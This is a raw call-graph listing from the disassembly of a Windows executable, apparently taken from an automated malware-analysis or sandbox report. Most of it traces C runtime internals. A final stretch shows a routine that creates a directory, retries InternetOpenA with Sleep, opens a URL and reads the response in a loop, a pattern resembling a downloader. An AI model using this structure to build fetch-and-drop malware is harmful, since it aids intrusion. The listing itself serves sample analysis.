17965->17951 17967 edca13 17965->17967 17966->17965 17998 eddac5 17967->17998 17972 edca43 17972->17949 17974 edca28 17974->17949 17976 edd9dd 17975->17976 17977 edd9be 17975->17977 17976->17951 17978 edd9c8 DeleteCriticalSection 17977->17978 17978->17976 17978->17978 17984 edda7c 17979->17984 17982 eddbec InitializeCriticalSectionAndSpinCount 17983 eddbd7 17982->17983 17983->17962 17985 edda94 17984->17985 17989 eddab7 17984->17989 17985->17989 17990 edd9e2 17985->17990 17988 eddaa9 GetProcAddress 17988->17989 17989->17982 17989->17983 17996 edd9ee 17990->17996 17991 edda62 17991->17988 17991->17989 17992 edda04 LoadLibraryExW 17993 edda69 17992->17993 17994 edda22 GetLastError 17992->17994 17993->17991 17995 edda71 FreeLibrary 17993->17995 17994->17996 17995->17991 17996->17991 17996->17992 17997 edda44 LoadLibraryExW 17996->17997 17997->17993 17997->17996 17999 edda7c ___vcrt_InitializeCriticalSectionEx 5 API calls 17998->17999 18000 eddadf 17999->18000 18001 eddaf8 TlsAlloc 18000->18001 18002 edca1d 18000->18002 18002->17974 18003 eddb76 18002->18003 18004 edda7c ___vcrt_InitializeCriticalSectionEx 5 API calls 18003->18004 18005 eddb90 18004->18005 18006 eddbab TlsSetValue 18005->18006 18007 edca36 18005->18007 18006->18007 18007->17972 18008 edca46 18007->18008 18009 edca56 18008->18009 18010 edca50 18008->18010 18009->17974 18012 eddb00 18010->18012 18013 edda7c ___vcrt_InitializeCriticalSectionEx 5 API calls 18012->18013 18014 eddb1a 18013->18014 18015 eddb32 TlsFree 18014->18015 18016 eddb26 18014->18016 18015->18016 18016->18009 18018 ef1743 18017->18018 18019 ed9fa1 18017->18019 18018->18019 18021 ee65b0 18018->18021 18019->17904 18019->17955 18022 ee65b7 18021->18022 18023 ee65fa GetStdHandle 18022->18023 18024 ee665c 18022->18024 18025 ee660d GetFileType 18022->18025 18023->18022 18024->18018 18025->18022 18027 ee30d1 18026->18027 18031 ee30e7 18026->18031 18027->18031 18032 ee30f4 18027->18032 18029 ee30de 18029->18031 18049 ee325f 18029->18049 18031->17908 18033 ee30fd 18032->18033 18034 ee3100 18032->18034 18033->18029 18057 eee877 18034->18057 18039 ee311d 18090 ee314e 18039->18090 18040 ee3111 18084 ee7311 18040->18084 18045 ee7311 ___free_lconv_mon 14 API calls 18046 ee3141 18045->18046 18047 ee7311 ___free_lconv_mon 14 API calls 18046->18047 18048 ee3147 18047->18048 18048->18029 18050 ee32d0 18049->18050 18055 ee326e 18049->18055 18050->18031 18051 eed831 WideCharToMultiByte _fread 18051->18055 18052 ee788f __dosmaperr 14 API calls 18052->18055 18053 ee32d4 18054 ee7311 ___free_lconv_mon 14 API calls 18053->18054 18054->18050 18055->18050 18055->18051 18055->18052 18055->18053 18056 ee7311 ___free_lconv_mon 14 API calls 18055->18056 18056->18055 18058 ee3106 18057->18058 18059 eee880 18057->18059 18063 eeeb76 GetEnvironmentStringsW 18058->18063 18112 ee62ca 18059->18112 18064 eeeb8e 18063->18064 18079 ee310b 18063->18079 18065 eed831 _fread WideCharToMultiByte 18064->18065 18066 eeebab 18065->18066 18067 eeebb5 FreeEnvironmentStringsW 18066->18067 18068 eeebc0 18066->18068 18067->18079 18069 ee824e std::_Locinfo::_Locinfo_dtor 15 API calls 18068->18069 18070 eeebc7 18069->18070 18071 eeebcf 18070->18071 18072 eeebe0 18070->18072 18073 ee7311 ___free_lconv_mon 14 API calls 18071->18073 18074 eed831 _fread WideCharToMultiByte 18072->18074 18075 eeebd4 FreeEnvironmentStringsW 18073->18075 18076 eeebf0 18074->18076 18075->18079 18077 eeebff 18076->18077 18078 eeebf7 18076->18078 18081 ee7311 ___free_lconv_mon 14 API calls 18077->18081 18080 ee7311 ___free_lconv_mon 14 API calls 18078->18080 18079->18039 18079->18040 18082 eeebfd FreeEnvironmentStringsW 18080->18082 18081->18082 18082->18079 18085 ee731c RtlFreeHeap 18084->18085 18089 ee3117 18084->18089 18086 ee7331 GetLastError 18085->18086 18085->18089 18087 ee733e __dosmaperr 18086->18087 18088 ee1de8 __dosmaperr 12 API calls 18087->18088 18088->18089 18089->18029 18091 ee3163 18090->18091 18092 ee788f __dosmaperr 14 API calls 18091->18092 18093 ee318a 18092->18093 18094 ee3192 18093->18094 18103 ee319c 18093->18103 18095 ee7311 ___free_lconv_mon 14 API calls 18094->18095 18111 ee3124 18095->18111 18096 ee31f9 18097 ee7311 ___free_lconv_mon 14 API calls 18096->18097 18097->18111 18098 ee788f __dosmaperr 14 API calls 18098->18103 18099 ee3208 18667 ee3230 18099->18667 18103->18096 18103->18098 18103->18099 18104 ee3223 18103->18104 18106 ee7311 ___free_lconv_mon 14 API calls 18103->18106 18658 ee54ef 18103->18658 18673 ee124a IsProcessorFeaturePresent 18104->18673 18105 ee7311 ___free_lconv_mon 14 API calls 18108 ee3215 18105->18108 18106->18103 18109 ee7311 ___free_lconv_mon 14 API calls 18108->18109 18109->18111 18110 ee322f 18111->18045 18113 ee62db 18112->18113 18114 ee62d5 18112->18114 18135 ee62e1 18113->18135 18165 ee7de3 18113->18165 18160 ee7da4 18114->18160 18120 ee62e6 18137 eee682 18120->18137 18121 ee6305 18123 ee630d 18121->18123 18124 ee6322 18121->18124 18126 ee7de3 __dosmaperr 6 API calls 18123->18126 18125 ee7de3 __dosmaperr 6 API calls 18124->18125 18127 ee632e 18125->18127 18128 ee6319 18126->18128 18129 ee6332 18127->18129 18130 ee6341 18127->18130 18133 ee7311 ___free_lconv_mon 14 API calls 18128->18133 18131 ee7de3 __dosmaperr 6 API calls 18129->18131 18177 ee603d 18130->18177 18131->18128 18133->18135 18135->18120 18182 ee1d07 18135->18182 18136 ee7311 ___free_lconv_mon 14 API calls 18136->18120 18461 eee7d7 18137->18461 18142 eee6c5 18142->18058 18145 eee6de 18148 ee7311 ___free_lconv_mon 14 API calls 18145->18148 18146 eee6ec 18486 eee8d2 18146->18486 18148->18142 18150 eee724 18151 ee1de8 __dosmaperr 14 API calls 18150->18151 18153 eee729 18151->18153 18152 eee73f 18154 eee76b 18152->18154 18159 ee7311 ___free_lconv_mon 14 API calls 18152->18159 18156 ee7311 ___free_lconv_mon 14 API calls 18153->18156 18155 eee7b4 18154->18155 18497 eee2fb 18154->18497 18158 ee7311 ___free_lconv_mon 14 API calls 18155->18158 18156->18142 18158->18142 18159->18154 18193 ee7b91 18160->18193 18162 ee7dc0 18163 ee7ddb TlsGetValue 18162->18163 18164 ee7dc9 18162->18164 18164->18113 18166 ee7b91 std::_Lockit::_Lockit 5 API calls 18165->18166 18167 ee7dff 18166->18167 18168 ee7e1d TlsSetValue 18167->18168 18169 ee62f5 18167->18169 18169->18135 18170 ee788f 18169->18170 18175 ee789c __dosmaperr 18170->18175 18171 ee78dc 18210 ee1de8 18171->18210 18172 ee78c7 HeapAlloc 18173 ee78da 18172->18173 18172->18175 18173->18121 18175->18171 18175->18172 18207 ee2b49 18175->18207 18247 ee5ed1 18177->18247 18349 eeb60b 18182->18349 18186 ee1d40 18188 ee36e7 __InternalCxxFrameHandler 21 API calls 18186->18188 18187 ee1d21 IsProcessorFeaturePresent 18190 ee1d2d 18187->18190 18191 ee1d4a 18188->18191 18189 ee1d17 18189->18186 18189->18187 18379 ee1021 18190->18379 18194 ee7bc1 18193->18194 18198 ee7bbd std::_Lockit::_Lockit 18193->18198 18194->18198 18199 ee7ac6 18194->18199 18197 ee7bdb GetProcAddress 18197->18198 18198->18162 18205 ee7ad7 18199->18205 18200 ee7b6d 18200->18197 18200->18198 18201 ee7af5 LoadLibraryExW 18202 ee7b74 18201->18202 18203 ee7b10 GetLastError 18201->18203 18202->18200 18204 ee7b86 FreeLibrary 18202->18204 18203->18205 18204->18200 18205->18200 18205->18201 18206 ee7b43 LoadLibraryExW 18205->18206 18206->18202 18206->18205 18213 ee2b75 18207->18213 18224 ee6360 GetLastError 18210->18224 18212 ee1ded 18212->18173 18214 ee2b81 ___scrt_is_nonwritable_in_current_image 18213->18214 18219 ee12ea EnterCriticalSection 18214->18219 18216 ee2b8c __InternalCxxFrameHandler 18220 ee2bc3 18216->18220 18219->18216 18223 ee1332 LeaveCriticalSection 18220->18223 18222 ee2b54 18222->18175 18223->18222 18225 ee6376 18224->18225 18228 ee637c 18224->18228 18226 ee7da4 __dosmaperr 6 API calls 18225->18226 18226->18228 18227 ee7de3 __dosmaperr 6 API calls 18229 ee6398 18227->18229 18228->18227 18244 ee6380 SetLastError 18228->18244 18231 ee788f __dosmaperr 12 API calls 18229->18231 18229->18244 18232 ee63ad 18231->18232 18233 ee63c6 18232->18233 18234 ee63b5 18232->18234 18236 ee7de3 __dosmaperr 6 API calls 18233->18236 18235 ee7de3 __dosmaperr 6 API calls 18234->18235 18238 ee63c3 18235->18238 18237 ee63d2 18236->18237 18239 ee63ed 18237->18239 18240 ee63d6 18237->18240 18242 ee7311 ___free_lconv_mon 12 API calls 18238->18242 18243 ee603d __dosmaperr 12 API calls 18239->18243 18241 ee7de3 __dosmaperr 6 API calls 18240->18241 18241->18238 18242->18244 18245 ee63f8 18243->18245 18244->18212 18246 ee7311 ___free_lconv_mon 12 API calls 18245->18246 18246->18244 18248 ee5edd ___scrt_is_nonwritable_in_current_image 18247->18248 18261 ee12ea EnterCriticalSection 18248->18261 18250 ee5ee7 18262 ee5f17 18250->18262 18253 ee5fe3 18254 ee5fef ___scrt_is_nonwritable_in_current_image 18253->18254 18266 ee12ea EnterCriticalSection 18254->18266 18256 ee5ff9 18267 ee61c4 18256->18267 18258 ee6011 18271 ee6031 18258->18271 18261->18250 18265 ee1332 LeaveCriticalSection 18262->18265 18264 ee5f05 18264->18253 18265->18264 18266->18256 18268 ee61fa __Getctype 18267->18268 18269 ee61d3 __Getctype 18267->18269 18268->18258 18269->18268 18274 ef0132 18269->18274 18348 ee1332 LeaveCriticalSection 18271->18348 18273 ee601f 18273->18136 18276 ef01b2 18274->18276 18277 ef0148 18274->18277 18279 ee7311 ___free_lconv_mon 14 API calls 18276->18279 18301 ef0200 18276->18301 18277->18276 18282 ef017b 18277->18282 18285 ee7311 ___free_lconv_mon 14 API calls 18277->18285 18278 ef020e 18289 ef026e 18278->18289 18296 ee7311 14 API calls ___free_lconv_mon 18278->18296 18280 ef01d4 18279->18280 18281 ee7311 ___free_lconv_mon 14 API calls 18280->18281 18283 ef01e7 18281->18283 18286 ee7311 ___free_lconv_mon 14 API calls 18282->18286 18300 ef019d 18282->18300 18287 ee7311 ___free_lconv_mon 14 API calls 18283->18287 18284 ee7311 ___free_lconv_mon 14 API calls 18288 ef01a7 18284->18288 18290 ef0170 18285->18290 18291 ef0192 18286->18291 18292 ef01f5 18287->18292 18293 ee7311 ___free_lconv_mon 14 API calls 18288->18293 18294 ee7311 ___free_lconv_mon 14 API calls 18289->18294 18302 eef436 18290->18302 18330 eef895 18291->18330 18298 ee7311 ___free_lconv_mon 14 API calls 18292->18298 18293->18276 18299 ef0274 18294->18299 18296->18278 18298->18301 18299->18268 18300->18284 18342 ef02a3 18301->18342 18303 eef447 18302->18303 18329 eef530 18302->18329 18304 eef458 18303->18304 18305 ee7311 ___free_lconv_mon 14 API calls 18303->18305 18306 eef46a 18304->18306 18307 ee7311 ___free_lconv_mon 14 API calls 18304->18307 18305->18304 18308 eef47c 18306->18308 18309 ee7311 ___free_lconv_mon 14 API calls 18306->18309 18307->18306 18310 eef48e 18308->18310 18311 ee7311 ___free_lconv_mon 14 API calls 18308->18311 18309->18308 18312 eef4a0 18310->18312 18313 ee7311 ___free_lconv_mon 14 API calls 18310->18313 18311->18310 18314 eef4b2 18312->18314 18315 ee7311 ___free_lconv_mon 14 API calls 18312->18315 18313->18312 18316 eef4c4 18314->18316 18317 ee7311 ___free_lconv_mon 14 API calls 18314->18317 18315->18314 18318 eef4d6 18316->18318 18319 ee7311 ___free_lconv_mon 14 API calls 18316->18319 18317->18316 18320 eef4e8 18318->18320 18321 ee7311 ___free_lconv_mon 14 API calls 18318->18321 18319->18318 18322 ee7311 ___free_lconv_mon 14 API calls 18320->18322 18323 eef4fa 18320->18323 18321->18320 18322->18323 18324 ee7311 ___free_lconv_mon 14 API calls 18323->18324 18326 eef50c 18323->18326 18324->18326 18325 eef51e 18328 ee7311 ___free_lconv_mon 14 API calls 18325->18328 18325->18329 18326->18325 18327 ee7311 ___free_lconv_mon 14 API calls 18326->18327 18327->18325 18328->18329 18329->18282 18331 eef8fa 18330->18331 18332 eef8a2 18330->18332 18331->18300 18333 eef8b2 18332->18333 18334 ee7311 ___free_lconv_mon 14 API calls 18332->18334 18335 eef8c4 18333->18335 18336 ee7311 ___free_lconv_mon 14 API calls 18333->18336 18334->18333 18337 eef8d6 18335->18337 18338 ee7311 ___free_lconv_mon 14 API calls 18335->18338 18336->18335 18339 eef8e8 18337->18339 18340 ee7311 ___free_lconv_mon 14 API calls 18337->18340 18338->18337 18339->18331 18341 ee7311 ___free_lconv_mon 14 API calls 18339->18341 18340->18339 18341->18331 18343 ef02cf 18342->18343 18344 ef02b0 18342->18344 18343->18278 18344->18343 18345 eefdbc __Getctype 14 API calls 18344->18345 18346 ef02c9 18345->18346 18347 ee7311 ___free_lconv_mon 14 API calls 18346->18347 18347->18343 18348->18273 18385 eeb539 18349->18385 18352 eeb650 18353 eeb65c ___scrt_is_nonwritable_in_current_image 18352->18353 18354 eeb6be __InternalCxxFrameHandler 18353->18354 18355 ee6360 __dosmaperr 14 API calls 18353->18355 18356 eeb6ac 18353->18356 18360 eeb68d __InternalCxxFrameHandler 18353->18360 18362 eeb6f4 __InternalCxxFrameHandler 18354->18362 18398 ee12ea EnterCriticalSection 18354->18398 18355->18360 18357 ee1de8 __dosmaperr 14 API calls 18356->18357 18358 eeb6b1 18357->18358 18396 ee121d 18358->18396 18360->18354 18360->18356 18370 eeb696 18360->18370 18364 eeb82e 18362->18364 18365 eeb731 18362->18365 18376 eeb75f 18362->18376 18366 eeb839 18364->18366 18430 ee1332 LeaveCriticalSection 18364->18430 18365->18376 18399 ee620f GetLastError 18365->18399 18369 ee36e7 __InternalCxxFrameHandler 21 API calls 18366->18369 18372 eeb841 18369->18372 18370->18189 18374 ee620f __Getctype 39 API calls 18377 eeb7b4 18374->18377 18375 ee620f __Getctype 39 API calls 18375->18376 18426 eeb7da 18376->18426 18377->18370 18378 ee620f __Getctype 39 API calls 18377->18378 18378->18370 18380 ee103d __InternalCxxFrameHandler __fread_nolock 18379->18380 18381 ee1069 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18380->18381 18382 ee113a __InternalCxxFrameHandler 18381->18382 18453 eda155 18382->18453 18384 ee1158 18384->18186 18386 eeb545 ___scrt_is_nonwritable_in_current_image 18385->18386 18391 ee12ea EnterCriticalSection 18386->18391 18388 eeb553 18392 eeb595 18388->18392 18391->18388 18395 ee1332 LeaveCriticalSection 18392->18395 18394 ee1d0c 18394->18189 18394->18352 18395->18394 18431 ee1169 18396->18431 18398->18362 18400 ee622b 18399->18400 18401 ee6225 18399->18401 18403 ee7de3 __dosmaperr 6 API calls 18400->18403 18405 ee622f SetLastError 18400->18405 18402 ee7da4 __dosmaperr 6 API calls 18401->18402 18402->18400 18404 ee6247 18403->18404 18404->18405 18407 ee788f __dosmaperr 14 API calls 18404->18407 18409 ee62bf 18405->18409 18410 ee62c4 18405->18410 18408 ee625c 18407->18408 18411 ee6264 18408->18411 18412 ee6275 18408->18412 18409->18375 18413 ee1d07 __FrameHandler3::FrameUnwindToState 37 API calls 18410->18413 18414 ee7de3 __dosmaperr 6 API calls 18411->18414 18415 ee7de3 __dosmaperr 6 API calls 18412->18415 18416 ee62c9 18413->18416 18417 ee6272 18414->18417 18418 ee6281 18415->18418 18422 ee7311 ___free_lconv_mon 14 API calls 18417->18422 18419 ee629c 18418->18419 18420 ee6285 18418->18420 18423 ee603d __dosmaperr 14 API calls 18419->18423 18421 ee7de3 __dosmaperr 6 API calls 18420->18421 18421->18417 18422->18405 18424 ee62a7 18423->18424 18425 ee7311 ___free_lconv_mon 14 API calls 18424->18425 18425->18405 18427 eeb7de 18426->18427 18429 eeb7a6 18426->18429 18452 ee1332 LeaveCriticalSection 18427->18452 18429->18370 18429->18374 18429->18377 18430->18366 18432 ee117b _Fputc 18431->18432 18437 ee11a0 18432->18437 18438 ee11b7 18437->18438 18439 ee11b0 18437->18439 18441 ee0ff8 _Fputc GetLastError SetLastError 18438->18441 18444 ee1193 18438->18444 18440 edde3b _Fputc 16 API calls 18439->18440 18440->18438 18442 ee11ec 18441->18442 18443 ee124a __Getctype 11 API calls 18442->18443 18442->18444 18445 ee121c 18443->18445 18446 eddccb 18444->18446 18447 eddcd7 18446->18447 18448 eddcee 18447->18448 18449 edde81 _Fputc 39 API calls 18447->18449 18450 eddd01 18448->18450 18451 edde81 _Fputc 39 API calls 18448->18451 18449->18448 18451->18450 18452->18429 18454 eda15d 18453->18454 18455 eda15e IsProcessorFeaturePresent 18453->18455 18454->18384 18457 eda89f 18455->18457 18460 eda862 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 18457->18460 18459 eda982 18459->18384 18460->18459 18462 eee7e3 ___scrt_is_nonwritable_in_current_image 18461->18462 18464 eee7fd 18462->18464 18505 ee12ea EnterCriticalSection 18462->18505 18466 eee6ac 18464->18466 18467 ee1d07 __FrameHandler3::FrameUnwindToState 39 API calls 18464->18467 18465 eee80d 18470 ee7311 ___free_lconv_mon 14 API calls 18465->18470 18471 eee839 18465->18471 18472 eee409 18466->18472 18469 eee876 18467->18469 18470->18471 18506 eee856 18471->18506 18510 ee1dfb 18472->18510 18475 eee43c 18477 eee453 18475->18477 18478 eee441 GetACP 18475->18478 18476 eee42a GetOEMCP 18476->18477 18477->18142 18479 ee824e 18477->18479 18478->18477 18480 ee828c 18479->18480 18484 ee825c __dosmaperr 18479->18484 18481 ee1de8 __dosmaperr 14 API calls 18480->18481 18483 ee828a 18481->18483 18482 ee8277 RtlAllocateHeap 18482->18483 18482->18484 18483->18145 18483->18146 18484->18480 18484->18482 18485 ee2b49 std::_Facet_Register 2 API calls 18484->18485 18485->18484 18487 eee409 41 API calls 18486->18487 18488 eee8f2 18487->18488 18490 eee92f IsValidCodePage 18488->18490 18491 eee9f7 18488->18491 18496 eee94a __fread_nolock 18488->18496 18489 eda155 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 18492 eee719 18489->18492 18490->18491 18493 eee941 18490->18493 18491->18489 18492->18150 18492->18152 18494 eee96a GetCPInfo 18493->18494 18493->18496 18494->18491 18494->18496 18552 eee4dd 18496->18552 18498 eee307 ___scrt_is_nonwritable_in_current_image 18497->18498 18632 ee12ea EnterCriticalSection 18498->18632 18500 eee311 18633 eee348 18500->18633 18505->18465 18509 ee1332 LeaveCriticalSection 18506->18509 18508 eee85d 18508->18464 18509->18508 18511 ee1e19 18510->18511 18512 ee1e12 18510->18512 18511->18512 18513 ee620f __Getctype 39 API calls 18511->18513 18512->18475 18512->18476 18514 ee1e3a 18513->18514 18518 ee829c 18514->18518 18519 ee82af 18518->18519 18520 ee1e50 18518->18520 18519->18520 18526 ef037e 18519->18526 18522 ee82fa 18520->18522 18523 ee830d 18522->18523 18524 ee8322 18522->18524 18523->18524 18547 eee8bf 18523->18547 18524->18512 18527 ef038a ___scrt_is_nonwritable_in_current_image 18526->18527 18528 ee620f __Getctype 39 API calls 18527->18528 18529 ef0393 18528->18529 18530 ef03d9 18529->18530 18539 ee12ea EnterCriticalSection 18529->18539 18530->18520 18532 ef03b1 18540 ef03ff 18532->18540 18537 ee1d07 __FrameHandler3::FrameUnwindToState 39 API calls 18538 ef03fe 18537->18538 18539->18532 18541 ef040d __Getctype 18540->18541 18543 ef03c2 18540->18543 18542 ef0132 __Getctype 14 API calls 18541->18542 18541->18543 18542->18543 18544 ef03de 18543->18544 18545 ee1332 std::_Lockit::~_Lockit LeaveCriticalSection 18544->18545 18546 ef03d5 18545->18546 18546->18530 18546->18537 18548 ee620f __Getctype 39 API calls 18547->18548 18549 eee8c4 18548->18549 18550 eee7d7 ctype 39 API calls 18549->18550 18551 eee8cf 18550->18551 18551->18524 18553 eee505 GetCPInfo 18552->18553 18562 eee5ce 18552->18562 18554 eee51d 18553->18554 18553->18562 18563 eeb19c 18554->18563 18556 eda155 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 18557 eee680 18556->18557 18557->18491 18561 eeb48c 43 API calls 18561->18562 18562->18556 18564 ee1dfb ctype 39 API calls 18563->18564 18565 eeb1bc 18564->18565 18583 eed777 18565->18583 18567 eeb1e9 18568 eeb278 18567->18568 18570 eeb270 18567->18570 18571 ee824e std::_Locinfo::_Locinfo_dtor 15 API calls 18567->18571 18574 eeb20e __fread_nolock __alloca_probe_16 18567->18574 18569 eda155 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 18568->18569 18572 eeb29b 18569->18572 18586 ed9c2f 18570->18586 18571->18574 18578 eeb48c 18572->18578 18574->18570 18575 eed777 __wsopen_s MultiByteToWideChar 18574->18575 18576 eeb257 18575->18576 18576->18570 18577 eeb25e GetStringTypeW 18576->18577 18577->18570 18579 ee1dfb ctype 39 API calls 18578->18579 18580 eeb49f 18579->18580 18595 eeb29d 18580->18595 18590 eed6df 18583->18590 18587 ed9c39 18586->18587 18588 ed9c4a 18586->18588 18587->18588 18592 ee07ca 18587->18592 18588->18568 18591 eed6f0 MultiByteToWideChar 18590->18591 18591->18567 18593 ee7311 ___free_lconv_mon 14 API calls 18592->18593 18594 ee07e2 18593->18594 18594->18588 18596 eeb2b8 ctype 18595->18596 18597 eed777 __wsopen_s MultiByteToWideChar 18596->18597 18600 eeb2fc 18597->18600 18598 eeb477 18599 eda155 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 18598->18599 18601 eeb48a 18599->18601 18600->18598 18602 ee824e std::_Locinfo::_Locinfo_dtor 15 API calls 18600->18602 18604 eeb322 __alloca_probe_16 18600->18604 18622 eeb3ca 18600->18622 18601->18561 18602->18604 18603 ed9c2f __freea 14 API calls 18603->18598 18605 eed777 __wsopen_s MultiByteToWideChar 18604->18605 18604->18622 18606 eeb36b 18605->18606 18606->18622 18623 ee7f62 18606->18623 18609 eeb3d9 18611 eeb462 18609->18611 18612 eeb3eb __alloca_probe_16 18609->18612 18613 ee824e std::_Locinfo::_Locinfo_dtor 15 API calls 18609->18613 18610 eeb3a1 18615 ee7f62 6 API calls 18610->18615 18610->18622 18614 ed9c2f __freea 14 API calls 18611->18614 18612->18611 18616 ee7f62 6 API calls 18612->18616 18613->18612 18614->18622 18615->18622 18617 eeb42e 18616->18617 18617->18611 18629 eed831 18617->18629 18619 eeb448 18619->18611 18620 eeb451 18619->18620 18621 ed9c2f __freea 14 API calls 18620->18621 18621->18622 18622->18603 18624 ee7a92 std::_Lockit::_Lockit 5 API calls 18623->18624 18625 ee7f6d 18624->18625 18626 ee7fbf LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 18625->18626 18628 ee7f73 18625->18628 18627 ee7fb3 LCMapStringW 18626->18627 18627->18628 18628->18609 18628->18610 18628->18622 18630 eed844 _fread 18629->18630 18631 eed882 WideCharToMultiByte 18630->18631 18631->18619 18632->18500 18643 ee0c1a 18633->18643 18635 eee36a 18636 ee0c1a __fread_nolock 39 API calls 18635->18636 18637 eee389 18636->18637 18638 eee31e 18637->18638 18639 ee7311 ___free_lconv_mon 14 API calls 18637->18639 18640 eee33c 18638->18640 18639->18638 18657 ee1332 LeaveCriticalSection 18640->18657 18642 eee32a 18642->18155 18644 ee0c2b 18643->18644 18648 ee0c27 ctype 18643->18648 18645 ee0c32 18644->18645 18650 ee0c45 __fread_nolock 18644->18650 18646 ee1de8 __dosmaperr 14 API calls 18645->18646 18647 ee0c37 18646->18647 18649 ee121d ___std_exception_copy 39 API calls 18647->18649 18648->18635 18649->18648 18650->18648 18651 ee0c7c 18650->18651 18652 ee0c73 18650->18652 18651->18648 18654 ee1de8 __dosmaperr 14 API calls 18651->18654 18653 ee1de8 __dosmaperr 14 API calls 18652->18653 18655 ee0c78 18653->18655 18654->18655 18656 ee121d ___std_exception_copy 39 API calls 18655->18656 18656->18648 18657->18642 18659 ee550b 18658->18659 18660 ee54fd 18658->18660 18661 ee1de8 __dosmaperr 14 API calls 18659->18661 18660->18659 18665 ee5523 18660->18665 18662 ee5513 18661->18662 18664 ee121d ___std_exception_copy 39 API calls 18662->18664 18663 ee551d 18663->18103 18664->18663 18665->18663 18666 ee1de8 __dosmaperr 14 API calls 18665->18666 18666->18662 18668 ee323d 18667->18668 18672 ee320e 18667->18672 18669 ee3254 18668->18669 18670 ee7311 ___free_lconv_mon 14 API calls 18668->18670 18671 ee7311 ___free_lconv_mon 14 API calls 18669->18671 18670->18668 18671->18672 18672->18105 18674 ee1256 18673->18674 18675 ee1021 __InternalCxxFrameHandler 8 API calls 18674->18675 18676 ee126b GetCurrentProcess TerminateProcess 18675->18676 18676->18110 18678 ed3172 __wsopen_s 18677->18678 18738 ed2ee0 CreateDirectoryA 18678->18738 18681 ed31ac 18855 ed7890 18681->18855 18682 ed31ca InternetOpenUrlA 18684 ed31ec 18682->18684 18685 ed3214 18682->18685 18688 ed7890 68 API calls 18684->18688 18799 ed4b50 18685->18799 18687 ed31c0 18687->18682 18689 ed3200 18688->18689 18690 ed320a InternetCloseHandle 18689->18690 18690->18685 18691 ed3229 18692 ed7890 68 API calls 18691->18692 18698 ed3281 18691->18698 18694 ed325a 18692->18694 18693 ed3288 InternetReadFile 18695 ed32c7 18693->18695 18693->18698 18697 ed7890 68 API calls 18694->18697 18809 ed4a40 18695->18809 18700 ed3263 18697->18700 18698->18693 18698->18695 18865 ed4c50 18698->18865 18703 ed326d InternetCloseHandle InternetCloseHandle 18700->18703 18703->18698 18705 ed32fb 18883 ed5180 18738->18883 18740 ed2f18 18741 ed5180 std::ios_base::failure::failure 40 API calls 18740->18741 18742 ed2f2c 18741->18742 18887 ed2cb0 InternetOpenA 18742->18887 18746 ed2f4c 18747 ed5110 task 39 API calls 18746->18747 18748 ed2f5b 18747->18748 18749 ed5180 std::ios_base::failure::failure 40 API calls 18748->18749 18750 ed2f68 18749->18750 18751 ed5180 std::ios_base::failure::failure 40 API calls 18750->18751 18752 ed2f7c 18751->18752 18753 ed2cb0 85 API calls 18752->18753 18754 ed2f8d 18753->18754 18755 ed5110 task 39 API calls 18754->18755 18756 ed2f9c 18755->18756 18757 ed5110 task 39 API calls 18756->18757 18758 ed2fab 18757->18758 18759 ed5180 std::ios_base::failure::failure 40 API calls 18758->18759 18760 ed2fbb 18759->18760 18761 ed5180 std::ios_base::failure::failure 40 API calls 18760->18761 18762 ed2fd2 18761->18762 18763 ed2cb0 85 API calls 18762->18763 18764 ed2fe9 18763->18764 18765 ed5110 task 39 API calls 18764->18765 18766 ed2ffb 18765->18766 18767 ed5110 task 39 API calls 18766->18767 18768 ed300d 18767->18768 18769 ed5180 std::ios_base::failure::failure 40 API calls 18768->18769 18770 ed301d 18769->18770 18771 ed5180 std::ios_base::failure::failure 40 API calls 18770->18771 18772 ed3034 18771->18772 18773 ed2cb0 85 API calls 18772->18773 18774 ed304b 18773->18774 18775 ed5110 task 39 API calls 18774->18775 18776 ed305d 18775->18776 18777 ed5110 task 39 API calls 18776->18777 18778 ed306f 18777->18778 18779 ed5180 std::ios_base::failure::failure 40 API calls 18778->18779 18780 ed307f 18779->18780 18781 ed5180 std::ios_base::failure::failure 40 API calls 18780->18781 18782 ed3096 18781->18782 18783 ed2cb0 85 API calls 18782->18783 18784 ed30ad 18783->18784 18785 ed5110 task 39 API calls 18784->18785 18786 ed30bf 18785->18786 18787 ed5110 task 39 API calls 18786->18787 18788 ed30d1 18787->18788 18789 ed5180 std::ios_base::failure::failure 40 API calls 18788->18789 18790 ed30e1 18789->18790 18791 ed5180 std::ios_base::failure::failure 40 API calls 18790->18791 18792 ed30f8 18791->18792 18793 ed2cb0 85 API calls 18792->18793 18794 ed310f 18793->18794 18795 ed5110 task 39 API calls 18794->18795 18796 ed3121 18795->18796 18797 ed5110 task 39 API calls 18796->18797 18798 ed3133 Sleep InternetOpenA 18797->18798 18798->18681 18798->18682 18800 ed4b7b Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot std::runtime_error::runtime_error 18799->18800 19045 ed6210 18800->19045 18806 ed4c17 18807 ed4c31 18806->18807 19062 ed6300 18806->19062 18807->18691 19518 ed5d60 18809->19518 18812 ed32d2 InternetCloseHandle InternetCloseHandle 18814 ed3620 18812->18814 18813 ed6300 40 API calls 18813->18812 18815 ed364b Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot std::runtime_error::runtime_error 18814->18815 19584 ed59d0 18815->19584 18818 ed5eb0 44 API calls 18819 ed36c9 18818->18819 18820 ed5dd0 78 API calls 18819->18820 18821 ed36e7 18820->18821 18822 ed3701 18821->18822 18823 ed6300 40 API calls 18821->18823 18822->18705 18823->18822 18857 ed78c2 char_traits 18855->18857 18856 ed5650 40 API calls 18863 ed7957 char_traits 18856->18863 18857->18856 18858 ed6300 40 API calls 18859 ed7b75 18858->18859 18860 ed55e0 40 API calls 18859->18860 18861 ed7b8a 18860->18861 18861->18687 18864 ed796d char_traits 18863->18864 19880 ed6170 18863->19880 18864->18858 18866 ed5650 40 API calls 18865->18866 18868 ed4c88 18866->18868 18867 ed6300 40 API calls 18869 ed4d4e 18867->18869 18872 ed6170 67 API calls 18868->18872 18873 ed4c9e 18868->18873 18870 ed55e0 40 API calls 18869->18870 18871 ed4d63 18870->18871 18871->18698 18872->18873 18873->18867 18884 ed51ab std::ios_base::failure::failure 18883->18884 18911 ed66a0 18884->18911 18886 ed51dd task 